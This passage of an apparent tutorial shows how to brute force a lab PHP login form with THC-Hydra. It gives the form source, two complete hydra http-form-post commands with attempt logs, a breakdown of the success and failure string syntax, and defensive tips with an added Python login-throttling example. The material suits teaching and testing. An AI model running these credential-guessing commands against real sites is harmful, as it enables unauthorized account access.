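Pay attention to the hydra option -e ns: n tries an empty password and s tries the login name as the password, which is why "root" and "" are the first two attempts in the output above.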

Web Form brute forcing

I have coded a simple HTML login form for this test. Hydra can brute force web forms faster and more effectively than other tools, but it requires you to understand how the form is handled, so the hacker needs a basic understanding of HTML too. The hacker (or you) also needs to find out the correct username; otherwise the attack will fail, or the username will have to be brute forced too, which is a really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<form action="log.php" method="post" >
Username:<input type="text" name="user" placeholder="admin"> <br>
Password:<input type="password" name="password" placeholder="password"><br>
<input type="submit" name="submit" value="submit" >
</form>
</center>

</body>
</html>

We actually need to brute force name="password". “password” is the name of the password field, whose value needs to match a string from the database or a string hard coded in the PHP. For your better understanding I am pasting log.php too:

<?php

$pass="yourpass";

$passGet=$_POST["password"];

if($passGet==$pass){
echo "success!";
echo "<br>";
}

else{
echo "fail";
}


?>

In the PHP code, $passGet=$_POST["password"]; gets the field string sent by the POST method, which is then compared with the variable $pass. If you enter yourpass in the password field it will say success, otherwise fail.

Imagine we don’t know the password, so we are going to brute force it using hydra. We have the following information:

URL: http://localhost/login/ (Optional?)
Action page: http://localhost/login/log.php   (Required)
User: admin
Form parameter:  user=admin&password=brute-force-here   (see the html!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found

Let's break down "/login/log.php:user=^USER^&password=^PASS^:S=success":

/login/ = path
log.php = action page
user = first parameter
^USER^ = replaced with the strings from -l or -L
password = second parameter
^PASS^ = replaced with the strings from -p or -P (usually a dictionary file; use -x for the brute-force option)
S=success = when Hydra sees the success message from the action page, it stops: the password has been cracked!
This is really important. If it is set wrong, Hydra will give false positives. So be careful!
 

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found

This command brute forces the page using the fail string. When a bad password is entered, the page generates the "fail" message. So we tell thc-hydra to keep attacking for as long as it sees the message "fail"; Hydra won't stop until it sees something other than "fail". But we need to be careful: if the success page contains the string "fail" somewhere, Hydra will give you false results. It depends on the situation! For example, a success page might have the following welcome message:

Welcome User! We are not responsible if you are fail to protect your confidential information. Be careful from hacker!

In this case Hydra will give a false result. So think about how you want to set the fail string!

Some tips against brute force:
1. Use a strong password.
2. The login page should have a captcha.
3. The server should count failed attempts and block the IP after a few failed login attempts.
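
Tip 3 as an added example (not code from the original post): a sliding-window failure counter keyed by client IP, replayed against the guess order from the Hydra output above, where the correct password arrives as guess 10. The threshold, window length, class and function names, and the client IP are assumptions made for the illustration.

```python
import hmac
import time
from collections import defaultdict, deque

STORED_PASSWORD = "yourpass"   # lab value from log.php; a real app verifies a password hash
MAX_FAILURES = 5               # assumed policy: failures tolerated per window
WINDOW_SECONDS = 300           # assumed policy: sliding window length

class LoginThrottle:
    """Counts failed logins per client IP inside a sliding time window."""

    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures

    def recent_failures(self, ip):
        """Drop timestamps that fell out of the window and return the rest."""
        queue = self.failures[ip]
        cutoff = self.clock() - self.window
        while queue and queue[0] <= cutoff:
            queue.popleft()
        return queue

    def attempt(self, ip, password):
        # Check the block before the password: a locked-out client must not
        # learn whether its guess was right.
        if len(self.recent_failures(ip)) >= self.max_failures:
            return "blocked"
        # Constant-time comparison instead of ==.
        if hmac.compare_digest(password.encode(), STORED_PASSWORD.encode()):
            self.failures.pop(ip, None)
            return "success"
        self.failures[ip].append(self.clock())
        return "fail"

# Guess order copied from the Hydra output above; the client IP is constructed.
HYDRA_GUESSES = ["Admin", "Administration", "crm", "CVS", "CYBERDOCS",
                 "CYBERDOCS25", "CYBERDOCS31", "INSTALL_admin", "Log",
                 "yourpass", "Logs", "Pages", "youradmin"]

def replay(throttle, ip="192.0.2.10", guesses=HYDRA_GUESSES):
    """Feed the guesses to the throttle and return the outcome of each one."""
    return [throttle.attempt(ip, guess) for guess in guesses]
```

With five failures allowed, the run is blocked from the sixth guess on, so the correct password at position 10 is never evaluated. Keying only on the source IP does not stop guesses spread over many addresses; counting failures per username as well covers that case.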

Hope you enjoyed!